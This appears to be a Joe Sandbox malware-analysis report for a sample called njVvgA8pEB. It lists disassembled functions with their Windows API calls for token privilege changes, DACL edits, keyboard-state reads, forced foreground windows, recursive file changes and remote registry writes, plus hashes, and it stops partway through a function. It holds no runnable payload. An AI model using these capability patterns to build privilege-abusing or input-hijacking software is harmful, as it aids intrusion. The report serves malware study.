                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(00000000,?), ref: 003148DF
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0034D665
                                                                          • IsIconic.USER32(?), ref: 0034D66E
                                                                          • ShowWindow.USER32(?,00000009), ref: 0034D67B
                                                                          • SetForegroundWindow.USER32(?), ref: 0034D685
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0034D69B
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0034D6A2
                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0034D6AE
                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0034D6BF
                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0034D6C7
                                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 0034D6CF
                                                                          • SetForegroundWindow.USER32(?), ref: 0034D6D2
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0034D6E7
                                                                          • keybd_event.USER32(00000012,00000000), ref: 0034D6F2
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0034D6FC
                                                                          • keybd_event.USER32(00000012,00000000), ref: 0034D701
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0034D70A
                                                                          • keybd_event.USER32(00000012,00000000), ref: 0034D70F
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0034D719
                                                                          • keybd_event.USER32(00000012,00000000), ref: 0034D71E
                                                                          • SetForegroundWindow.USER32(?), ref: 0034D721
                                                                          • AttachThreadInput.USER32(?,?,00000000), ref: 0034D748
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 4125248594-2988720461
                                                                          • Opcode ID: e8a15c15928e8996c2eb30ca322be22e138343392f5a7dac4a74cfe0606b1ea7
                                                                          • Instruction ID: 9bfc9d29e97d0deca9d6132b35d9eb5458c467633e6aa07fea86cbe904214abf
                                                                          • Opcode Fuzzy Hash: e8a15c15928e8996c2eb30ca322be22e138343392f5a7dac4a74cfe0606b1ea7
                                                                          • Instruction Fuzzy Hash: 5C316571A40318BFEB226F619C49F7F7FACEB44B50F114026FA04EA1D1C6B15D51ABA1
                                                                          Function 00368310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 003687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0036882B
                                                                            • Part of subcall function 003687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00368858
                                                                            • Part of subcall function 003687E1: GetLastError.KERNEL32 ref: 00368865
                                                                          • _memset.LIBCMT ref: 00368353
                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003683A5
                                                                          • CloseHandle.KERNEL32(?), ref: 003683B6
                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003683CD
                                                                          • GetProcessWindowStation.USER32 ref: 003683E6
                                                                          • SetProcessWindowStation.USER32(00000000), ref: 003683F0
                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0036840A
                                                                            • Part of subcall function 003681CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00368309), ref: 003681E0
                                                                            • Part of subcall function 003681CB: CloseHandle.KERNEL32(?,?,00368309), ref: 003681F2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                          • String ID: $default$winsta0
                                                                          • API String ID: 2063423040-1027155976
                                                                          • Opcode ID: 577d8d662832ed76543cdb84a4054b89e80242e42558a71ab64af9408dfff358
                                                                          • Instruction ID: fb127444d3e8fbf79b808887b54fc6fca519862f4722644d1c82c8cf7cd83247
                                                                          • Opcode Fuzzy Hash: 577d8d662832ed76543cdb84a4054b89e80242e42558a71ab64af9408dfff358
                                                                          • Instruction Fuzzy Hash: 35816D71900209AFDF12DFA5CC45AEE7BBDFF09304F14826AF915A6265DB328E14DB20
                                                                          Function 0037C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0037C78D
                                                                          • FindClose.KERNEL32(00000000), ref: 0037C7E1
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0037C806
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0037C81D
                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0037C844
                                                                          • __swprintf.LIBCMT ref: 0037C890
                                                                          • __swprintf.LIBCMT ref: 0037C8D3
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                          • __swprintf.LIBCMT ref: 0037C927
                                                                            • Part of subcall function 00333698: __woutput_l.LIBCMT ref: 003336F1
                                                                          • __swprintf.LIBCMT ref: 0037C975
                                                                            • Part of subcall function 00333698: __flsbuf.LIBCMT ref: 00333713
                                                                            • Part of subcall function 00333698: __flsbuf.LIBCMT ref: 0033372B
                                                                          • __swprintf.LIBCMT ref: 0037C9C4
                                                                          • __swprintf.LIBCMT ref: 0037CA13
                                                                          • __swprintf.LIBCMT ref: 0037CA62
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                          • API String ID: 3953360268-2428617273
                                                                          • Opcode ID: dfb2062206a87ce2be32e135909b305f3880f3ef098cde554c1f335133d698cb
                                                                          • Instruction ID: 579f252603f09b98e071cdd6c62ff387af82478e98b102acb7ae99cec936b194
                                                                          • Opcode Fuzzy Hash: dfb2062206a87ce2be32e135909b305f3880f3ef098cde554c1f335133d698cb
                                                                          • Instruction Fuzzy Hash: CAA12FB1404204ABC716EF64C896EEFB7ECAF98700F40491EF595CA191EB35DA49CB62
                                                                          Function 0037EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0037EFB6
                                                                          • _wcscmp.LIBCMT ref: 0037EFCB
                                                                          • _wcscmp.LIBCMT ref: 0037EFE2
                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0037EFF4
                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 0037F00E
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0037F026
                                                                          • FindClose.KERNEL32(00000000), ref: 0037F031
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0037F04D
                                                                          • _wcscmp.LIBCMT ref: 0037F074
                                                                          • _wcscmp.LIBCMT ref: 0037F08B
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0037F09D
                                                                          • SetCurrentDirectoryW.KERNEL32(003C8920), ref: 0037F0BB
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0037F0C5
                                                                          • FindClose.KERNEL32(00000000), ref: 0037F0D2
                                                                          • FindClose.KERNEL32(00000000), ref: 0037F0E4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 1803514871-438819550
                                                                          • Opcode ID: e3c3b08f7783162154aa8ab640875457b19d728506a1cc15baf09669a5de1390
                                                                          • Instruction ID: d0109f58853180cbfdcc3a28bcc0f95ea721e9e4ac375a46fca418793e7f3481
                                                                          • Opcode Fuzzy Hash: e3c3b08f7783162154aa8ab640875457b19d728506a1cc15baf09669a5de1390
                                                                          • Instruction Fuzzy Hash: D231E5365012186FDB26AFB4DC48FEE77ACAF49360F148176E808E2191DB75DE80CB51
                                                                          Function 00390857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00390953
                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0039F910,00000000,?,00000000,?,?), ref: 003909C1
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00390A09
                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00390A92
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00390DB2
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00390DBF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Close$ConnectCreateRegistryValue
                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                          • API String ID: 536824911-966354055
                                                                          • Opcode ID: 0a25c1e6bad82f5d9c6acfc157d8f142eead756a0edafc25d35fa105cf71f228
                                                                          • Instruction ID: dfbe5fc1c767776db46442c5e9f95627cf2e07611fb850c84d2df44e0ba3e6ed
                                                                          • Opcode Fuzzy Hash: 0a25c1e6bad82f5d9c6acfc157d8f142eead756a0edafc25d35fa105cf71f228
                                                                          • Instruction Fuzzy Hash: 20027C756006119FCB1AEF18C895E6AB7E9FF89310F05855DF89A9B362CB30ED41CB81
                                                                          Function 003266E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 0D;$0E;$0F;$3c2$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG;$_2
                                                                          • API String ID: 0-966160533
                                                                          • Opcode ID: 773f2a3502c8258e84bebf42ca7bf0364c00859c3f5d511e0bef4412bb44767b
                                                                          • Instruction ID: ca4ce6bb27bcf3041eac9d663dcdff02f44c0038d8f0b99a990e2eddc054f8ef
                                                                          • Opcode Fuzzy Hash: 773f2a3502c8258e84bebf42ca7bf0364c00859c3f5d511e0bef4412bb44767b
                                                                          • Instruction Fuzzy Hash: E072A475E00229CBDF16CF59D8817AEB7B5FF48310F25816AE906EB694DB309D81CB90
                                                                          Function 0037F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0037F113
                                                                          • _wcscmp.LIBCMT ref: 0037F128
                                                                          • _wcscmp.LIBCMT ref: 0037F13F
                                                                            • Part of subcall function 00374385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003743A0
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0037F16E
                                                                          • FindClose.KERNEL32(00000000), ref: 0037F179
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0037F195
                                                                          • _wcscmp.LIBCMT ref: 0037F1BC
                                                                          • _wcscmp.LIBCMT ref: 0037F1D3
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0037F1E5
                                                                          • SetCurrentDirectoryW.KERNEL32(003C8920), ref: 0037F203
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0037F20D
                                                                          • FindClose.KERNEL32(00000000), ref: 0037F21A
                                                                          • FindClose.KERNEL32(00000000), ref: 0037F22C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                          • String ID: *.*
                                                                          • API String ID: 1824444939-438819550
                                                                          • Opcode ID: dad484a373ea9c41991e551dfc5722964f5f08cbe66cd7c36c0293a5ccc59dca
                                                                          • Instruction ID: 9989d2853cbc7ce8670d330f916d2a85ba5789a57116f31a9dc11d37df47e286
                                                                          • Opcode Fuzzy Hash: dad484a373ea9c41991e551dfc5722964f5f08cbe66cd7c36c0293a5ccc59dca
                                                                          • Instruction Fuzzy Hash: 1631E73A50021DAFDB22AF74EC89FEE77ACAF45360F118576E808E2091DB35DE45CA54
                                                                          Function 0037A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0037A20F
                                                                          • __swprintf.LIBCMT ref: 0037A231
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0037A26E
                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0037A293
                                                                          • _memset.LIBCMT ref: 0037A2B2
                                                                          • _wcsncpy.LIBCMT ref: 0037A2EE
                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0037A323
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0037A32E
                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 0037A337
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0037A341
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                          • String ID: :$\$\??\%s
                                                                          • API String ID: 2733774712-3457252023
                                                                          • Opcode ID: 2a075d761d8bf0efc52fa0dc9e4f10bdd09a1427bc8b98caf34689a5e53d9093
                                                                          • Instruction ID: 5bcfbc6ba368833f4e9587120fe244f72ffbfc820b76395adeecd8ffcc0c56ee
                                                                          • Opcode Fuzzy Hash: 2a075d761d8bf0efc52fa0dc9e4f10bdd09a1427bc8b98caf34689a5e53d9093
                                                                          • Instruction Fuzzy Hash: 0031CFB6904109ABDB22DFA0DC89FEF77BCEF88700F1081B6F508D6161EB7596448B25
                                                                          Function 00367CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00368202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0036821E
                                                                            • Part of subcall function 00368202: GetLastError.KERNEL32(?,00367CE2,?,?,?), ref: 00368228
                                                                            • Part of subcall function 00368202: GetProcessHeap.KERNEL32(00000008,?,?,00367CE2,?,?,?), ref: 00368237
                                                                            • Part of subcall function 00368202: HeapAlloc.KERNEL32(00000000,?,00367CE2,?,?,?), ref: 0036823E
                                                                            • Part of subcall function 00368202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00368255
                                                                            • Part of subcall function 0036829F: GetProcessHeap.KERNEL32(00000008,00367CF8,00000000,00000000,?,00367CF8,?), ref: 003682AB
                                                                            • Part of subcall function 0036829F: HeapAlloc.KERNEL32(00000000,?,00367CF8,?), ref: 003682B2
                                                                            • Part of subcall function 0036829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00367CF8,?), ref: 003682C3
                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00367D13
                                                                          • _memset.LIBCMT ref: 00367D28
                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00367D47
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00367D58
                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00367D95
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00367DB1
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00367DCE
                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00367DDD
                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00367DE4
                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00367E05
                                                                          • CopySid.ADVAPI32(00000000), ref: 00367E0C
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00367E3D
                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00367E63
                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00367E77
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                          • String ID:
                                                                          • API String ID: 3996160137-0
                                                                          • Opcode ID: 5a036b0ad86a15085b678d766d78f9576c4ac633445218395c3982e5dd9fecab
                                                                          • Instruction ID: 3600c8557c02c76c697d4c47a2511e70461501deac957d0973e66320bcd37bab
                                                                          • Opcode Fuzzy Hash: 5a036b0ad86a15085b678d766d78f9576c4ac633445218395c3982e5dd9fecab
                                                                          • Instruction Fuzzy Hash: A1616D71900209AFDF02DFA4DC44AEEBB79FF04304F04826AF815E6291DB329E15CBA0
                                                                          Function 0037001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 00370097
                                                                          • SetKeyboardState.USER32(?), ref: 00370102
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00370122
                                                                          • GetKeyState.USER32(000000A0), ref: 00370139
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00370168
                                                                          • GetKeyState.USER32(000000A1), ref: 00370179
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 003701A5
                                                                          • GetKeyState.USER32(00000011), ref: 003701B3
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 003701DC
                                                                          • GetKeyState.USER32(00000012), ref: 003701EA
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00370213
                                                                          • GetKeyState.USER32(0000005B), ref: 00370221
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: 67252fd8589d8d1ac12a516c11dd177f19c714431273c53195b7c77c770a5252
                                                                          • Instruction ID: a12229cd325caa6f6c0cb87ec6d06abd90c5ace8b1f8d8c7c02d942fb6c78f9d
                                                                          • Opcode Fuzzy Hash: 67252fd8589d8d1ac12a516c11dd177f19c714431273c53195b7c77c770a5252
                                                                          • Instruction Fuzzy Hash: D151FE2490478899FB3BD7B088547EABFB49F01380F49C59ED5C95A1C3DAAC9B8CC761
                                                                          Function 003903DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00390E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0038FDAD,?,?), ref: 00390E31
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003904AC
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0039054B
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003905E3
                                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00390822
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0039082F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 1240663315-0
                                                                          • Opcode ID: 548c5b4fc852efad488b73544756673b0e92da442e9d22b02262e43f8705412c
                                                                          • Instruction ID: f4d2647c684aaa963e42b0d59168c28c6f301a75daf19fcd212005d9605b7f6a
                                                                          • Opcode Fuzzy Hash: 548c5b4fc852efad488b73544756673b0e92da442e9d22b02262e43f8705412c
                                                                          • Instruction Fuzzy Hash: F1E14E31604210AFCB1ADF24C895E6BBBE8EF89714F04856DF84ADB261D731ED41CB91
                                                                          Function 003883BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          • CoInitialize.OLE32 ref: 00388403
                                                                          • CoUninitialize.OLE32 ref: 0038840E
                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,003A2BEC,?), ref: 0038846E
